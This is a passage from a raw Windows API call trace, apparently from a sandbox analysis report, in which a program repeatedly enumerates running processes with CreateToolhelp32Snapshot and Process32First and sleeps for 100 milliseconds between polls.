szExeFile="[System Process]")) returned 1 [0111.287] Sleep (dwMilliseconds=0x64) [0111.613] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1be4 [0111.623] Process32First (in: hSnapshot=0x1be4, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.695] Sleep (dwMilliseconds=0x64) [0111.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1be4 [0111.809] Process32First (in: hSnapshot=0x1be4, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.876] Sleep (dwMilliseconds=0x64) [0111.985] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1be4 [0111.996] Process32First (in: hSnapshot=0x1be4, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.065] Sleep (dwMilliseconds=0x64) [0112.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1be4 [0112.182] Process32First (in: hSnapshot=0x1be4, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.241] Sleep (dwMilliseconds=0x64) [0112.345] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0112.358] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.436] Sleep (dwMilliseconds=0x64) [0112.539] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0112.551] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.639] Sleep (dwMilliseconds=0x64) [0112.749] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0112.825] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.884] Sleep (dwMilliseconds=0x64) [0112.993] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0113.003] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.061] Sleep (dwMilliseconds=0x64) [0113.164] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0113.175] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.235] Sleep (dwMilliseconds=0x64) [0113.337] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0113.348] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.428] Sleep (dwMilliseconds=0x64) [0113.542] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0113.552] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.640] Sleep (dwMilliseconds=0x64) [0113.742] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0113.753] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.813] Sleep (dwMilliseconds=0x64) [0113.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0113.956] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.070] Sleep (dwMilliseconds=0x64) [0114.211] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0114.224] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.334] Sleep (dwMilliseconds=0x64) [0114.446] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0114.457] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.525] Sleep (dwMilliseconds=0x64) [0114.635] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0114.646] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.711] Sleep (dwMilliseconds=0x64) [0114.837] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0114.850] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.957] Sleep (dwMilliseconds=0x64) [0115.072] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0115.083] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.205] Sleep (dwMilliseconds=0x64) [0115.322] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0115.334] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.428] Sleep (dwMilliseconds=0x64) [0115.545] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0115.555] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.659] Sleep (dwMilliseconds=0x64) [0115.764] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0115.774] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.847] Sleep (dwMilliseconds=0x64) [0115.952] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0115.971] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.062] Sleep (dwMilliseconds=0x64) [0116.171] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0116.185] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.244] Sleep (dwMilliseconds=0x64) [0116.355] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0116.370] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.440] Sleep (dwMilliseconds=0x64) [0116.543] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0116.554] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.634] Sleep (dwMilliseconds=0x64) [0116.747] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0116.760] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.834] Sleep (dwMilliseconds=0x64) [0116.949] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0116.959] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.024] Sleep (dwMilliseconds=0x64) [0117.136] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0117.148] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.209] Sleep (dwMilliseconds=0x64) [0117.461] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0117.476] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.560] Sleep (dwMilliseconds=0x64) [0117.671] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2178 [0117.683] Process32First (in: hSnapshot=0x2178, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.766] Sleep (dwMilliseconds=0x64) [0117.876] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0117.904] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.975] Sleep (dwMilliseconds=0x64) [0118.089] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0118.100] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.165] Sleep (dwMilliseconds=0x64) [0118.277] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0118.296] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.367] Sleep (dwMilliseconds=0x64) [0118.496] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0118.508] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.583] Sleep (dwMilliseconds=0x64) [0118.699] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0118.712] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.791] Sleep (dwMilliseconds=0x64) [0118.902] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0118.916] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.019] Sleep (dwMilliseconds=0x64) [0119.122] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0119.134] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.196] Sleep (dwMilliseconds=0x64) [0119.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0119.322] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.411] Sleep (dwMilliseconds=0x64) [0119.527] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0119.538] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.628] Sleep (dwMilliseconds=0x64) [0119.745] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0119.757] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.822] Sleep (dwMilliseconds=0x64) [0119.934] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0119.944] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.021] Sleep (dwMilliseconds=0x64) [0120.136] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0120.151] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.222] Sleep (dwMilliseconds=0x64) [0120.340] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0120.354] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.453] Sleep (dwMilliseconds=0x64) [0120.556] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0120.571] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.644] Sleep (dwMilliseconds=0x64) [0120.793] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0120.804] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.925] Sleep (dwMilliseconds=0x64) [0121.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0121.055] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.129] Sleep (dwMilliseconds=0x64) [0121.243] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0121.257] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.329] Sleep (dwMilliseconds=0x64) [0121.431] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0121.443] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.530] Sleep (dwMilliseconds=0x64) [0121.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0121.653] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.744] Sleep (dwMilliseconds=0x64) [0121.853] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0121.867] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.950] Sleep (dwMilliseconds=0x64) [0122.262] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0122.276] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.339] Sleep (dwMilliseconds=0x64) [0122.447] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0122.458] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.527] Sleep (dwMilliseconds=0x64) [0122.635] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0122.648] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.722] Sleep (dwMilliseconds=0x64) [0122.837] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0122.854] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.932] Sleep (dwMilliseconds=0x64) [0123.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0123.052] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.111] Sleep (dwMilliseconds=0x64) [0123.369] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0123.379] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.456] Sleep (dwMilliseconds=0x64) [0123.574] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0123.586] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.657] Sleep (dwMilliseconds=0x64) [0123.759] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0123.771] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.878] Sleep (dwMilliseconds=0x64) [0123.993] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0124.006] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.064] Sleep (dwMilliseconds=0x64) [0124.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0124.175] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.232] Sleep (dwMilliseconds=0x64) [0124.337] 